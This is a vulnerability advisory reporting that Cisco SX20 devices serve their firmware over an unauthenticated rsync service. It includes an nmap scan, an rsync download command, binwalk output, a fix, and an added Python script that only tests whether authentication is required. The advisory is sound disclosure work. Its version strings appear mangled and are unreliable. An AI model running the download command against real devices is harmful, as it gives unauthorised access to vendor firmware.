usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/184.108.40.20600-18 (likely in all versions)
Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 220.127.116.1100-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“
Description
usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.
The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.
Proof of Concept
Let 10.10.10.10 be the IP address of a SX20 device.
An nmap scan identifies the following open services:
4043/tcp open rsync (protocol version 29)
4045/tcp open lockd?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:
|     version: ce9.4.1 6ae80e1f2ee 2018-08-14
|     method: rsync
|     url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg
|_    targets: 102300-3,102310-0,102310-1,101282-0
The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .
Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
3487          0xD9F           PEM certificate
7324          0x1C9C          Executable script, shebang: "/bin/sh"
13549         0x34ED          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16
13613         0x352D          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5
13672         0x3568          Unix path: /sys/class/gpio/gpio137/value
13808         0x35F0          Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20
44361273      0x2A4E639       uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32"
44496781      0x2A6F78D       CRC32 polynomial table, little endian
44505174      0x2A71856       Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long"
44607241      0x2A8A709       CRC32 polynomial table, little endian
44612405      0x2A8BB35       uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW"
44613317      0x2A8BEC5       gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25
64949749      0x3DF0DF5       uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW"
64967148      0x3DF51EC       gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)
68741741      0x418EA6D       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34
89684647      0x5587AA7       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39
Please note that at the point of this writing, usd AG has not performed any additional firmware analysis.
Fix
Enable authentication for the rsync service or disable it if possible.
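As an added check that is not part of this advisory or of any Cisco tooling, the following Python script verifies whether an rsync daemon hands out a module without authentication (the condition reported above) or whether the fix is in place. It performs only the rsync daemon greeting and module request and then disconnects, so nothing is listed or transferred; the status strings are those of the rsync daemon protocol, and host, port and module name are the values from the proof of concept.

```python
import socket
import sys

# Status lines of the rsync daemon protocol (as emitted by rsync's daemon code).
STATUS_OK = "@RSYNCD: OK"
STATUS_AUTHREQD = "@RSYNCD: AUTHREQD"
STATUS_EXIT = "@RSYNCD: EXIT"


def classify_line(line: str) -> str:
    """Classify one reply line received after the module name was sent."""
    line = line.rstrip("\r\n")
    if line == STATUS_OK:
        return "unauthenticated"   # module is served without any password
    if line.startswith(STATUS_AUTHREQD + " "):
        return "auth-required"     # daemon sent a challenge first: fix in place
    if line.startswith("@ERROR"):
        return "denied"            # unknown module, hosts deny, etc.
    if line == STATUS_EXIT:
        return "closed"
    return "motd"                  # free text (motd) may precede the status


def verdict(lines, max_lines: int = 50) -> str:
    """Walk reply lines until a status line appears; bounded so a chatty or
    misbehaving daemon cannot keep the audit reading forever."""
    for i, line in enumerate(lines):
        if i >= max_lines:
            break
        kind = classify_line(line)
        if kind != "motd":
            return kind
    return "no-status"


def audit_module(host: str, port: int, module: str, timeout: float = 5.0) -> str:
    """Greeting and module request only; the connection is closed afterwards."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = sock.makefile("rb")
        greeting = reader.readline().decode(errors="replace")
        if not greeting.startswith("@RSYNCD:"):
            return "not-rsyncd"
        sock.sendall(b"@RSYNCD: 29\n")          # protocol version seen in the nmap output
        sock.sendall(module.encode() + b"\n")
        return verdict(iter(lambda: reader.readline().decode(errors="replace"), ""))


if __name__ == "__main__":
    # usage: python3 rsync_auth_check.py 10.10.10.10 4043 idefix
    host, port, module = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    print(f"{host}:{port}/{module}: {audit_module(host, port, module)}")
```

A result of "unauthenticated" reproduces the exposure described above; "auth-required" or "denied" shows that the fix is effective.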
Timeline
- 2018-10-31 Advisory has been sent to email@example.com
- 2018-11-07 Cisco states that they do not consider this to be an exposure
- 2018-11-09 extended public disclosure deadline to 2019-01-23
- 2019-01-23 Security advisory released
Credits
This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.
ABOUT usd SECURITY ADVISORIES
In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.
Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.
Always for the sake of our mission: „more security.“
In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.